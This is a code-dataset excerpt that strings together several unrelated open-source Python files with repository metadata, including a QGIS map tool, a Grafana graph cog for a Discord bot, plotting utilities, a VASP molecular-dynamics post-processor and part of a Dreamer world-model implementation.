        - Navigates to Product Configuration
        - Asserts that the promote button is disabled
        - Asserts that there is no notification for the outdated config
"""
settings = navigator.navigate(ProductSettingsView, product=service)
settings.change_authentication('service_proxy_authentication_method_oidc')
settings = navigator.navigate(ProductConfigurationView, product=service)
assert settings.outdated_config.is_enabled
assert settings.configuration.staging_promote_btn.is_displayed
settings.configuration.staging_promote_btn.click()
settings = navigator.navigate(ProductSettingsView, product=service)
settings.update_client_id('azpza')
settings.update_button.click()
assert settings.client_id.value == 'azpza'
settings = navigator.navigate(ProductConfigurationView, product=service)
assert settings.configuration.staging_promote_btn.is_enabled
assert settings.outdated_config.is_displayed
assert service.proxy.list().configs.latest().entity['content']['proxy']['authentication_method']
| 42.148936
| 100
| 0.759717
|
3bcd6b7c8111cfd644ddfa6a792d4eaae4d1d916
| 2,807
|
py
|
Python
|
rubber.py
|
flexarts/giprouter-qgis-plugin
|
1008753b1183a59cb6f1f99f541c2e3f89438059
|
[
"MIT"
] | null | null | null |
rubber.py
|
flexarts/giprouter-qgis-plugin
|
1008753b1183a59cb6f1f99f541c2e3f89438059
|
[
"MIT"
] | null | null | null |
rubber.py
|
flexarts/giprouter-qgis-plugin
|
1008753b1183a59cb6f1f99f541c2e3f89438059
|
[
"MIT"
] | null | null | null |
from qgis.core import *
from qgis.gui import *
from qgis.PyQt.QtCore import *
from qgis.PyQt.QtGui import *
class RectangleMapTool(QgsMapToolEmitPoint):
onExtentChanged = pyqtSignal(QgsRectangle)
def __init__(self, canvas):
self.canvas = canvas
QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = QgsRubberBand(self.canvas, QgsWkbTypes.LineGeometry)
self.rubberBand.setColor(Qt.red)
self.rubberBand.setWidth(1)
self.reset()
def reset(self):
self.startPoint = self.endPoint = None
self.isEmittingPoint = False
        self.rubberBand.reset(QgsWkbTypes.LineGeometry)
def canvasPressEvent(self, e):
self.startPoint = self.toMapCoordinates(e.pos())
self.endPoint = self.startPoint
self.isEmittingPoint = True
self.showRect(self.startPoint, self.endPoint)
def canvasReleaseEvent(self, e):
self.isEmittingPoint = False
r = self.rectangle()
if r is not None:
print("Rectangle:", r.xMinimum(), r.yMinimum(), r.xMaximum(), r.yMaximum())
self.onExtentChanged.emit(r)
def canvasMoveEvent(self, e):
if not self.isEmittingPoint:
return
self.endPoint = self.toMapCoordinates(e.pos())
self.showRect(self.startPoint, self.endPoint)
def hideRect(self):
self.reset()
self.rubberBand.reset(QgsWkbTypes.LineGeometry)
def showRect(self, startPoint, endPoint):
self.rubberBand.reset(QgsWkbTypes.LineGeometry)
if startPoint.x() == endPoint.x() or startPoint.y() == endPoint.y():
return
point1 = QgsPointXY(startPoint.x(), startPoint.y())
point2 = QgsPointXY(startPoint.x(), endPoint.y())
point3 = QgsPointXY(endPoint.x(), endPoint.y())
point4 = QgsPointXY(endPoint.x(), startPoint.y())
point5 = QgsPointXY(startPoint.x(), startPoint.y())
self.rubberBand.addPoint(point1, False)
self.rubberBand.addPoint(point2, False)
self.rubberBand.addPoint(point3, False)
self.rubberBand.addPoint(point4, False)
self.rubberBand.addPoint(point5, True) # true to update canvas
self.rubberBand.show()
def rectangle(self):
if self.startPoint is None or self.endPoint is None:
return None
elif self.startPoint.x() == self.endPoint.x() or self.startPoint.y() == self.endPoint.y():
return None
sourceCrs = self.canvas.mapSettings().destinationCrs()
destCrs = QgsCoordinateReferenceSystem(4326)
tr = QgsCoordinateTransform(sourceCrs, destCrs, QgsProject.instance())
p1 = QgsGeometry.fromPointXY(self.startPoint)
p1.transform(tr)
p2 = QgsGeometry.fromPointXY(self.endPoint)
p2.transform(tr)
return QgsRectangle(p1.asPoint(), p2.asPoint())
def deactivate(self):
# Do whatever you want here
QgsMapTool.deactivate(self)
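# Hedged usage sketch (not part of the plugin module): attaching the tool to the QGIS
# map canvas and reacting to the emitted WGS84 extent; `iface` is the standard QGIS
# plugin interface object and is assumed here.
#
#   tool = RectangleMapTool(iface.mapCanvas())
#   tool.onExtentChanged.connect(lambda rect: print(rect.toString()))
#   iface.mapCanvas().setMapTool(tool)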
| 33.023529
| 96
| 0.685073
|
ce44d83210d3c0bd730166874852d103eb8dbbd1
| 4,924
|
py
|
Python
|
analysis/utils.py
|
chrrel/extensions
|
1151924b462f9d7516f6b341e4c5300a5a2707af
|
[
"CC-BY-4.0"
] | 1
|
2020-07-08T15:48:48.000Z
|
2020-07-08T15:48:48.000Z
|
analysis/utils.py
|
chrrel/extensions
|
1151924b462f9d7516f6b341e4c5300a5a2707af
|
[
"CC-BY-4.0"
] | 2
|
2020-07-08T15:44:22.000Z
|
2020-07-08T15:44:22.000Z
|
analysis/utils.py
|
chrrel/extensions
|
1151924b462f9d7516f6b341e4c5300a5a2707af
|
[
"CC-BY-4.0"
] | null | null | null |
import csv
import json
import logging
import os
from collections import defaultdict
import matplotlib.pyplot as plt
import tikzplotlib
from pandas import DataFrame
def write_json_file(file_path: str, results):
with open(file_path, "w") as json_file:
json.dump(results, json_file, default=_set_default, indent=4)
def read_json_file(file_path: str):
with open(file_path) as json_file:
data = json.load(json_file)
return data
def _set_default(obj) -> list:
"""Convert sets to list since JSON does not support sets."""
if isinstance(obj, set):
return list(obj)
raise TypeError
def get_tranco_list(file_path: str) -> defaultdict:
tranco = defaultdict(int)
with open(file_path) as f:
for row in csv.reader(f, delimiter=",", skipinitialspace=True):
position = int(row[0])
domain = row[1]
tranco[domain] = position
return tranco
def retrieve_data(file_path: str, cb):
"""
Return data from JSON file at file_path if the file exists. Otherwise execute the callback which returns
the data and writes it to file_path.
"""
if os.path.isfile(file_path):
data = read_json_file(file_path)
else:
data = cb()
write_json_file(file_path, data)
return data
def build_query_strings_from_message_data(extensions: list, table_name: str) -> list:
# Build the needed query strings for every extension
for extension in extensions:
extension["query_strings"] = []
# For every message there will be one query string
for message in extension["messages"]:
logging.debug(json.dumps(message))
query_string = f"SELECT website_id, url, data FROM {table_name}, website WHERE website_id=website.id "
message_dicts = []
message_keys = []
for message_component in message:
if type(message_component) is dict:
# All key/value pairs of known messages
message_dicts.append(message_component)
else:
# components that are no dicts are treated as keys
message_keys.append(message_component)
# Append query options to search for specific key/value pairs in messages, e.g. [{"method": "abc"}]
# --> SELECT website_id, data FROM postmessage WHERE data @> '{"method": "abc"}' ;
for message_dict in message_dicts:
query_string = query_string + f"and data @> '{json.dumps(message_dict)}' "
# Append query options for messages that have the given keys, e.g. 'action' and 'value'
# --> SELECT website_id, data FROM postmessage WHERE data ?& array['action', 'value'] ;
if message_keys:
query_string = query_string + f"and data ?& array{message_keys} "
# Append a ';' at the end to close the query string
query_string = query_string + ";"
extension["query_strings"].append(query_string)
logging.debug(query_string)
return extensions
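# Hedged illustration (not part of the original module) of the query strings produced
# above, assuming a table named "postmessage" and a single known message pattern:
#
#   extensions = [{"messages": [[{"method": "abc"}, "value"]]}]
#   build_query_strings_from_message_data(extensions, "postmessage")
#   # extensions[0]["query_strings"][0] ->
#   #   SELECT website_id, url, data FROM postmessage, website WHERE website_id=website.id
#   #   and data @> '{"method": "abc"}' and data ?& array['value'] ;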
def draw_stacked_bar_chart(df: DataFrame, labels: list, colors: list, legend_col_count: int, output_path: str):
plt.rcParams["font.family"] = "TeX Gyre Pagella"
plt.figure()
ax = df.plot(kind="barh", stacked=True, width=0.4, color=colors, label=labels)
ax.update({"ylabel": "", "xlabel": ""})
    # Set position of the bar and the graph
ax.set_ylim([-0.4, 1])
plt.gcf().subplots_adjust(bottom=0.45, top=0.65)
# Format xtick labels as percentage
ax.set_xticklabels(['{:,.0%}'.format(x) for x in ax.get_xticks()])
# Hide yaxis and all yticks (needed for tikz)
ax.yaxis.set_visible(False)
ax.set_yticklabels([""])
ax.tick_params(left=False, bottom=False)
ax.grid(axis="x", which='both', alpha=0.6, linestyle=":"),
# Hide the sourrounding box
#plt.box(on=None)
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(0.2)
legend = ax.legend(loc="upper center", bbox_transform=plt.gcf().transFigure, labels=labels, ncol=legend_col_count)
legend.get_frame().set_linewidth(0.3)
plt.savefig(f"{output_path}.pdf", bbox_inches="tight")
tikzplotlib.save(
f"{output_path}.tex",
axis_width="320",
extra_axis_parameters=["x grid style={dotted,color=CTsemi}"],
)
plt.close()
def draw_donut_chart(df: DataFrame, output_path: str, legend_labels: list, descriptions: dict):
plt.figure()
df.plot.pie(
figsize=(4, 8),
counterclock=False,
startangle=-270,
autopct="%.2f %%",
pctdistance=0.78,
labels=legend_labels,
textprops={"color": "white", "fontsize": 18},
colors=["#c1e7ff", "#a3cbe5", "#86b0cc", "#6996b3", "#4c7c9b", "#2d6484", "#004c6d"],
)
plt.gcf().gca().legend(
bbox_to_anchor=(1.5, 0.5),
loc="center right",
bbox_transform=plt.gcf().transFigure,
labels=legend_labels
)
plt.gcf().gca().axis('off')
# Add title, labels for axes, etc.
plt.gca().update(descriptions)
# Add a white circle in the middle to create a donut diagram
middle_circle_white = plt.Circle((0, 0), 0.55, color='white')
plt.gcf().gca().add_artist(middle_circle_white)
# Save and close diagram
plt.savefig(output_path, bbox_inches="tight")
o = output_path.replace(".pdf", "")
tikzplotlib.save(
f"{o}.tex",
axis_width="260",
)
plt.close()
| 31.164557
| 115
| 0.710804
|
52e866d563eec61b61a107ce31659aa0d5e7ab8b
| 385
|
py
|
Python
|
project-socialdistribution/accounts/admin.py
|
CMPUT404-2021F/CMPUT404-project-socialdistribution
|
feaf28b75a38a8c474a6a17d8c0134be99fb2479
|
[
"W3C-20150513"
] | null | null | null |
project-socialdistribution/accounts/admin.py
|
CMPUT404-2021F/CMPUT404-project-socialdistribution
|
feaf28b75a38a8c474a6a17d8c0134be99fb2479
|
[
"W3C-20150513"
] | null | null | null |
project-socialdistribution/accounts/admin.py
|
CMPUT404-2021F/CMPUT404-project-socialdistribution
|
feaf28b75a38a8c474a6a17d8c0134be99fb2479
|
[
"W3C-20150513"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserCreationForm, CustomUserChangeForm
from .models import CustomUser
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
form = CustomUserChangeForm
model = CustomUser
admin.site.register(CustomUser, CustomUserAdmin)
| 27.5
| 63
| 0.815584
|
3bdcc576dba411555e2f9943e100aba6a79cded0
| 9,709
|
py
|
Python
|
grafana/grafana.py
|
Malarne/predacogs
|
350c97468e587827df3ed87237aac6f7baab60de
|
[
"MIT"
] | 38
|
2019-05-13T19:42:31.000Z
|
2022-02-28T10:09:30.000Z
|
grafana/grafana.py
|
Malarne/predacogs
|
350c97468e587827df3ed87237aac6f7baab60de
|
[
"MIT"
] | 39
|
2019-05-26T01:55:26.000Z
|
2022-01-28T15:53:29.000Z
|
grafana/grafana.py
|
Malarne/predacogs
|
350c97468e587827df3ed87237aac6f7baab60de
|
[
"MIT"
] | 50
|
2019-03-27T15:59:36.000Z
|
2022-03-12T09:33:56.000Z
|
import time
from datetime import datetime, timedelta
from io import BytesIO
from typing import Optional
import aiohttp
import discord
from redbot.core import Config, commands
from redbot.core.bot import Red
from redbot.core.commands.converter import TimedeltaConverter
from redbot.core.utils.chat_formatting import box, humanize_list
from tabulate import tabulate
from .utils import Panel, find_panel
class Grafana(commands.Cog):
"""Grafana graphs in your Discord!"""
__author__ = ["Predä", "Fixator10"]
__version__ = "1.0.1"
async def red_delete_data_for_user(self, **kwargs):
"""Nothing to delete."""
return
def __init__(self, bot: Red):
self.bot = bot
self.session = aiohttp.ClientSession()
self.config = Config.get_conf(self, identifier=0xEA016D013C7B488894399820F2BE9874)
self.config.register_global(url="http://localhost:3000", dashboard_id=None, panels={})
def cog_unload(self):
self.bot.loop.create_task(self.session.close())
def format_help_for_context(self, ctx: commands.Context) -> str:
"""Thanks Sinbad!"""
pre_processed = super().format_help_for_context(ctx)
return f"{pre_processed}\n\nAuthors: {', '.join(self.__author__)}\nCog Version: {self.__version__}"
async def fetch_grafana(self, **kwargs):
from_time = kwargs.get("timedelta")
params = {
"orgId": 1,
"from": int((datetime.now() - from_time).timestamp()) * 1000,
"to": int(time.time()) * 1000,
"panelId": kwargs.get("panelid"),
"width": 1000,
"height": 500,
"tz": "UTC",
}
try:
async with self.session.get(
f"{await self.config.url()}/render/d-solo/{await self.config.dashboard_id()}",
params=params,
) as resp:
if resp.status != 200:
return None, {}
return BytesIO(await resp.read()), params
except aiohttp.ClientConnectionError:
return None, {}
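    # Hedged illustration (not part of the original cog): for the default 1-day window the
    # request above resolves to Grafana's single-panel image renderer endpoint, roughly
    #   GET <url>/render/d-solo/<dashboard_id>
    #       ?orgId=1&from=<now-24h, ms>&to=<now, ms>&panelId=<id>&width=1000&height=500&tz=UTC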
@commands.group(invoke_without_command=True)
@commands.cooldown(1, 2, commands.BucketType.user)
@commands.max_concurrency(1, commands.BucketType.guild)
async def graph(
self,
ctx: commands.Context,
from_time: Optional[TimedeltaConverter] = timedelta(days=1),
*,
panel: Panel,
):
"""Render an image of a selected panel of [botname] metrics."""
async with ctx.typing():
file, params = await self.fetch_grafana(panelid=panel.id, timedelta=from_time)
if not file:
return await ctx.send("Failed to fetch Grafana.")
msg = (
f"{await self.config.url()}/d/{await self.config.dashboard_id()}?"
f"panelId={params['panelId']}&fullscreen&orgId={params['orgId']}"
f"&from={params['from']}&to={params['to']}"
)
filename = "&".join([f"{k}={v}" for k, v in params.items()])
return await ctx.send(msg, file=discord.File(file, filename=f"graph-{filename}.png"))
@graph.command(name="list")
async def list_graphs(self, ctx: commands.Context):
"""List all panels that can be used with `[p]graph` command."""
if panels := await self.config.panels():
await ctx.send(box(humanize_list(list(panels.keys()))))
else:
await ctx.send("No panels configured.")
@graph.group(name="set")
@commands.is_owner()
async def set_graphs(self, ctx: commands.Context):
"""Setup grafana cog."""
@set_graphs.command(name="showsettings", aliases=["settings"])
async def graphs_settings(self, ctx: commands.Context):
"""Show current settings."""
config_without_panels = await self.config.all()
del config_without_panels["panels"]
await ctx.send(box(tabulate(config_without_panels.items())))
@set_graphs.command(name="url")
async def grafana_url(self, ctx: commands.Context, *, url: str):
"""Setup url of your Grafana instance.
Default: `http://localhost:3000`"""
if not url.startswith("http"):
url = "http://" + url
url = url.rstrip("/")
async with ctx.typing():
try:
async with self.session.get(f"{url}/api/health") as r:
if r.status != 200:
await ctx.send(f"Incorrect URL. HTTP error returned: {r.status}")
return
try:
if j := await r.json():
if j.get("database") != "ok":
await ctx.send(
"API didnt returned right state of DB, is your Grafana ok?"
)
return
else:
await ctx.send(
"That URL hasn't returned a JSON. Is it a Grafana server?"
)
return
except aiohttp.ContentTypeError:
await ctx.send("That URL hasn't returned a JSON. Is it a Grafana server?")
return
except aiohttp.InvalidURL:
await ctx.send("This is not a valid URL. Check your input and try again.")
return
except aiohttp.ClientConnectorError:
await ctx.send("Server did not respond. Check your input and try again.")
return
await self.config.url.set(url)
await ctx.send(
f"Don't forget to setup dashboard via `{ctx.clean_prefix}graph set dashboard` too.\n"
f"After that you can use `{ctx.clean_prefix}graph set panels import` to import your panels."
)
@set_graphs.command()
async def dashboard(self, ctx: commands.Context, *, did: str):
"""Set dashboard id.
This command needs id from URL.
Example: ```
http://localhost:3000/d/AbCdEf0G/dashboard
^ here ^
```"""
try:
async with self.session.get(
f"{await self.config.url()}/api/dashboards/uid/{did}"
) as r:
try:
rj = await r.json()
except aiohttp.ContentTypeError:
rj = {}
if r.status != 200:
await ctx.send(
"Unable to found provided dashboard: "
f"{rj.get('message') or 'Unknown error, did you set up an url?'}"
)
return
except aiohttp.ClientConnectorError:
await ctx.send("Server did not respond. Make sure that URL setting is set correctly.")
return
await self.config.dashboard_id.set(did)
await ctx.send(
f"Make sure that you setup URL via `{ctx.clean_prefix}graph set url`.\n"
f"After that you can use `{ctx.clean_prefix}graph set panels import` to import your panels."
)
@set_graphs.group()
async def panels(self, ctx: commands.Context):
"""Setup graphs on dashboard."""
@panels.command(name="import")
@commands.max_concurrency(1)
async def graphs_import(self, ctx: commands.Context):
"""Automatically import all graphs from dashboard, overwriting already saved."""
try:
async with self.session.get(
f"{await self.config.url()}/api/dashboards/uid/{await self.config.dashboard_id()}",
raise_for_status=True,
) as r:
r = await r.json()
await self.config.panels.set(
{
p["title"].casefold().replace(" ", "_") or f"panel_{p['id']}": p["id"]
for p in r["dashboard"]["panels"]
if p["type"] != "row"
}
)
await ctx.tick()
except aiohttp.ClientResponseError as e:
await ctx.send(
f"Unable to import graphs, are URL and dashboard ID set?\n{e.status}: {e.message}"
)
except aiohttp.ClientConnectorError:
await ctx.send(f"Unable to import graphs, are URL and dashboard ID set?")
@panels.command(name="remove")
async def graphs_remove(self, ctx: commands.Context, *, panel: Panel):
"""Remove certain graph from list."""
async with self.config.panels() as panels:
del panels[panel.name]
await ctx.tick()
@panels.command(name="add")
async def graphs_add(self, ctx: commands.Context, pid: int, *, name: str):
"""Add certain graph to list manually."""
try:
async with self.session.get(
f"{await self.config.url()}/api/dashboards/uid/{await self.config.dashboard_id()}",
raise_for_status=True,
) as r:
r = await r.json()
if not await find_panel(r["dashboard"]["panels"], pid):
await ctx.send("This panel is not found on current set dashboard.")
return
        except aiohttp.ClientResponseError as e:
            await ctx.send(
                f"Unable to import graphs, are URL and dashboard ID set?\n{e.status}: {e.message}"
            )
            return
        except aiohttp.ClientConnectorError:
            await ctx.send("Unable to import graphs, are URL and dashboard ID set?")
            return
async with self.config.panels() as panels:
panels[name.casefold().replace(" ", "_")] = pid
await ctx.tick()
| 41.139831
| 107
| 0.554846
|
c3e8f8abdf0f49c8b21f5dba32ff584f7938d78e
| 10,855
|
py
|
Python
|
pymatflow/elk/post/md.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 6
|
2020-03-06T16:13:08.000Z
|
2022-03-09T07:53:34.000Z
|
pymatflow/exciting/post/md.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-10-02T02:23:08.000Z
|
2021-11-08T13:29:37.000Z
|
pymatflow/elk/post/md.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-07-10T16:28:14.000Z
|
2021-07-10T16:28:14.000Z
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
import os
import sys
import datetime
import subprocess
import matplotlib.pyplot as plt
from pymatflow.vasp.base.xyz import Atom
class md_post:
"""
Note:
        md_post extracts information from a molecular dynamics run and can
        print out the trajectory file (xyz format).
"""
def __init__(self, output="OUTCAR"):
"""
output:
the output file of md run.
"""
self.file = output
self.electronic_params = {}
self.ionic_params = {}
self.run_info = {}
self.job_done = None # whether calculation has finished
#self.cell = None # optimized cell
self.trajectory = None
with open(self.file, 'r') as fout:
self.lines = fout.readlines()
self.get_info()
def get_info(self):
"""
        get the general information of the md run from the output file
which is now stored in self.lines
"""
# check whether calculation is finished
if len(self.lines[-1].split()) == 4 and self.lines[-1].split()[0] == "Voluntary" and self.lines[-1].split()[1] == "context":
self.job_done = True
else:
self.job_done = False
#
self.get_trajectory()
self.get_opt_params_and_run_info()
def get_trajectory(self):
self.trajectory = []
for i in range(len(self.lines)):
if len(self.lines[i].split()) > 0 and self.lines[i].split()[0] == "POSITION" and self.lines[i].split()[1] == "TOTAL-FORCE":
atm = []
j = i + 2
while len(self.lines[j].split()) == 6:
atm.append(Atom("x", float(self.lines[j].split()[0]), float(self.lines[j].split()[1]), float(self.lines[j].split()[2])))
j = j + 1
self.trajectory.append(atm)
#
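    # Hedged illustration (not from the original source): the OUTCAR block parsed by
    # get_trajectory looks roughly like
    #   POSITION                                       TOTAL-FORCE (eV/Angst)
    #   -----------------------------------------------------------------------
    #     0.00000  0.00000  0.00000        0.000000  0.000000  0.000000
    # i.e. six columns per atom line, of which only the three coordinates are kept.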
def get_opt_params_and_run_info(self):
"""
run_info["iterations"]: scf iterations per scf step
run_info["total-energies"]: total energies of every scf step
run_info["fermi-energies"]: fermi energies of every scf step
run_info["total-forces-rms"]: total RMS forces of every scf step
"""
self.run_info["iterations"] = []
self.run_info["total-energies"] = []
self.run_info["fermi-energies"] = []
self.run_info["total-forces-rms"] = []
for line in self.lines:
# if it is an empty line continue to next line
if len(line.split()) == 0:
continue
if line.split()[0] == "executed" and line.split()[1] == "on" and line.split()[3] == "date":
self.run_info["start-time"] = line.split("\n")[0]
#if line.split()[0] == "This" and line.split()[1] == "run" and line.split()[3] == "terminated":
# self.run_info["stop-time"] = line.split("\n")[0]
if len(line.split()) == 4 and line.split()[1] == "Iteration":
self.run_info["iterations"].append(line)
if line.split()[0] == "energy" and line.split()[1] == "without" and line.split()[2] == "entropy=":
self.run_info["total-energies"].append(float(line.split()[3]))
if line.split()[0] == "E-fermi" and line.split()[1] == ":":
self.run_info["fermi-energies"].append(float(line.split()[2]))
if line.split()[0] == "FORCES:" and line.split()[1] == "max":
self.run_info["total-forces-rms"].append(float(line.split()[5]))
if line.split()[0] == "ENCUT" and line.split()[1] == "=":
self.electronic_params["ENCUT"] = float(line.split()[2])
if line.split()[0] == "EDIFF" and line.split()[1] == "=":
self.electronic_params["EDIFF"] = float(line.split()[2])
if line.split()[0] == "LREAL" and line.split()[1] == "=":
self.electronic_params["LREAL"] = line.split()[2]
if line.split()[0] == "EDIFFG" and line.split()[1] == "=":
self.ionic_params["EDIFFG"] = float(line.split()[2])
if line.split()[0] == "NSW" and line.split()[1] == "=":
self.ionic_params["NSW"] = int(line.split()[2])
if line.split()[0] == "IBRION" and line.split()[1] == "=":
self.ionic_params["IBRION"] = int(line.split()[2])
if line.split()[0] == "NFREE" and line.split()[1] == "=":
self.ionic_params["NFREE"] = int(line.split()[2])
if line.split()[0] == "ISIF" and line.split()[1] == "=":
self.ionic_params["ISIF"] = int(line.split()[2])
if line.split()[0] == "POTIM" and line.split()[1] == "=":
self.ionic_params["POTIM"] = float(line.split()[2])
if line.split()[0] == "TEIN" and line.split()[1] == "=":
self.ionic_params["TEIN"] = float(line.split()[2])
if line.split()[0] == "TEBEG" and line.split()[1] == "=":
self.ionic_params["TEBEG"] = float(line.split()[2].split(";")[0])
if line.split()[0] == "SMASS" and line.split()[1] == "=":
self.ionic_params["SMASS"] = float(line.split()[2])
if line.split()[0] == "PSTRESS=":
self.ionic_params["PSTRESS"] = float(line.split()[1])
#self.run_info["scf-cycles"] = len(self.run_info["iterations"])
#if self.run_type == "relax":
# self.run_info["ion-steps"] = len(self.run_info["iterations"]) - 1
#elif self.run_type == "vc-relax":
# self.run_info["ion-steps"] = len(self.run_info["iterations"]) - 2
def print_trajectory(self, xyz="trajectory.xyz"):
with open(xyz, 'w') as fout:
for i in range(len(self.trajectory)):
fout.write("%d\n" % len(self.trajectory[i]))
fout.write("i = %d\n" % i)
for atom in self.trajectory[i]:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
def view_trajectory(self, trajfile="trajectory.xyz"):
#os.system("xcrysden --xyz %s" % trajfile)
subprocess.call(["xcrysden", "--xyz", trajfile])
def plot_run_info(self):
"""
"""
#plt.plot(self.run_info["iterations"])
#plt.title("Iterations per SCF")
#plt.xlabel("Scf cycles")
#plt.ylabel("iterations")
#plt.tight_layout()
#plt.savefig("iterations-per-scf.png")
#plt.close()
plt.plot(self.run_info["total-energies"])
plt.title("Total energies per SCF")
plt.xlabel("Scf cycles")
plt.ylabel("Total Energies (eV)")
plt.tight_layout()
plt.savefig("total-energies-per-scf.png")
plt.close()
plt.plot(self.run_info["fermi-energies"])
plt.title("Fermi energies per SCF")
plt.xlabel("Scf cycles")
plt.ylabel("Fermi energies (eV)")
plt.tight_layout()
plt.savefig("fermi-energies-per-scf.png")
plt.close()
plt.plot(self.run_info["total-forces-rms"])
plt.title("Total forces(RMS) per SCF")
plt.xlabel("Scf cycles")
plt.ylabel("Total forces (eV/Angst)")
plt.tight_layout()
plt.savefig("total-forces-rms-per-scf.png")
plt.close()
def markdown_report(self, md="MolecularDynamicsReport.md"):
"""
when writing Chinese to a file you must specify
encoding='utf-8' when open the file for writing
"""
with open(md, 'w', encoding='utf-8') as fout:
fout.write("# 分子动力学实验统计\n")
fout.write("任务是否结束:%s\n" % str(self.job_done))
fout.write("## 离子步参数\n")
for item in self.ionic_params:
fout.write("- %s: %s\n" % (item, str(self.ionic_params[item])))
fout.write("## 电子步参数\n")
for item in self.electronic_params:
fout.write("- %s: %s\n" % (item, str(self.electronic_params[item])))
fout.write("## 运行信息\n")
# calculate the running time and print it out
            # Important: the length of the time string might be different, depending
# on the value of hours and minutes and seconds. if they are two digits
# number, they will be divided like: '11: 6: 2', only when they all are
# two digtis number, they will not be divided '11:16:12'
# so we have to preprocess it to build the right time string to pass into
# datetime.datetime.strptime()
start_str = self.run_info["start-time"].split()[4]+"-"+self.run_info["start-time"].split()[5]
if self.job_done == True:
#stop_str = self.run_info["stop-time"].split()[8]+"-"+self.run_info["stop-time"].split()[5]+self.run_info["stop-time"].split()[6]+self.run_info["stop-time"].split()[7]
pass
start = datetime.datetime.strptime(start_str, "%Y.%m.%d-%H:%M:%S")
#if self.job_done == True:
# stop = datetime.datetime.strptime(stop_str, "%d%b%Y-%H:%M:%S")
# delta_t = stop -start
fout.write("- Time consuming:\n")
fout.write(" - job starts at %s\n" % start)
#if self.job_done == True:
# fout.write(" - totally %.1f seconds, or %.3f minutes or %.5f hours\n" % (delta_t.total_seconds(), delta_t.total_seconds()/60, delta_t.total_seconds()/3600))
#else:
# fout.write(" - job is not finished yet, but it starts at %s\n" % start)
# end the time information
for item in self.run_info:
fout.write("- %s: %s\n" % (item, str(self.run_info[item])))
fout.write("## 运行信息图示\n")
fout.write("Iterations per SCF\n")
fout.write("\n")
fout.write("Total energies per SCF\n")
fout.write("\n")
fout.write("Fermi energies per SCF\n")
fout.write("\n")
fout.write("Total forces per SCF\n")
fout.write("\n")
def export(self):
"""
Note:
* will only printout the final structure if the job is done
"""
self.print_trajectory()
self.plot_run_info()
self.markdown_report("MolecularDyanamicsport.md")
| 45.41841
| 184
| 0.532289
|
a80601d924a26c8803353ee345b114fe209f940a
| 20,873
|
py
|
Python
|
models.py
|
zplizzi/dreamer-pytorch
|
582d534023c4e145489d59915c16e19d054d91b0
|
[
"MIT"
] | null | null | null |
models.py
|
zplizzi/dreamer-pytorch
|
582d534023c4e145489d59915c16e19d054d91b0
|
[
"MIT"
] | null | null | null |
models.py
|
zplizzi/dreamer-pytorch
|
582d534023c4e145489d59915c16e19d054d91b0
|
[
"MIT"
] | null | null | null |
from typing import List, Tuple
from typing import Optional
from torch import Tensor
import numpy as np
import torch
import torch.distributions
from einops import rearrange
from torch import jit
from torch import nn
from torch.distributions.normal import Normal
from torch.distributions.transformed_distribution import TransformedDistribution
from torch.nn import functional as F
def bottle(f, x_tuple):
"""Adapts inputs with shape (T, B, ...) to work with a function f expecting shape (B, ...).
TODO: this might be clearer as a function wrapper."""
T, B = x_tuple[0].shape[:2]
x_tuple = (rearrange(x, "t b ... -> (t b) ...", t=T, b=B) for x in x_tuple)
y = f(*x_tuple)
return rearrange(y, "(t b) ... -> t b ...", t=T, b=B)
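# Hedged usage example (not part of the original file): applying the visual encoder over
# a (T, B, C, H, W) batch with bottle, assuming 64x64 RGB observations.
#
#   obs = torch.zeros(10, 4, 3, 64, 64)                  # T=10, B=4
#   enc = VisualEncoder(embedding_size=1024)             # defined further below
#   emb = bottle(enc, (obs,))                            # -> shape (10, 4, 1024)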
class TransitionModel(jit.ScriptModule):
__constants__ = ["min_std_dev"]
def __init__(
self,
belief_size,
state_size,
action_size,
hidden_size,
embedding_size,
activation_function="relu",
min_std_dev=0.1,
):
super().__init__()
self.min_std_dev = min_std_dev
self.fc_embed_state_action = nn.Linear(state_size + action_size, belief_size)
self.rnn = nn.GRUCell(belief_size, belief_size)
self.fc_embed_belief_prior = nn.Linear(belief_size, hidden_size)
self.fc_state_prior = nn.Linear(hidden_size, 2 * state_size)
self.fc_embed_belief_posterior = nn.Linear(belief_size + embedding_size, hidden_size)
self.fc_state_posterior = nn.Linear(hidden_size, 2 * state_size)
self.modules = [
self.fc_embed_state_action,
self.fc_embed_belief_prior,
self.fc_state_prior,
self.fc_embed_belief_posterior,
self.fc_state_posterior,
]
# Operates over (previous) state, (previous) actions, (previous) belief, (previous) nonterminals (mask), and (current) observations
# Diagram of expected inputs and outputs for T = 5 (-x- signifying beginning of output belief/state that gets sliced off):
# t : 0 1 2 3 4 5
# o : -X--X--X--X--X-
# a : -X--X--X--X--X-
# n : -X--X--X--X--X-
# pb: -X-
# ps: -X-
# b : -x--X--X--X--X--X-
# s : -x--X--X--X--X--X-
# @jit.script_method
# def forward(
# self,
# prev_state: torch.Tensor,
# actions: torch.Tensor,
# prev_belief: torch.Tensor,
# enc_observations: torch.Tensor,
# nonterminals: torch.Tensor,
# ):
# """
# Computes transitions for an entire sequence.
# If enc_observations is given, "training mode" is used where the state posterior is the base of the next
# timestep. Else, in "test mode", the prior is rolled out.
#
# Input: init_belief, init_state: torch.Size([50, 200]) torch.Size([50, 30])
# Output: beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs
# torch.Size([49, 50, 200]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30])
# """
# # Create lists for hidden states (cannot use single tensor as buffer because autograd won't work with inplace writes)
# T = actions.size(0) + 1
# # beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs = (
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
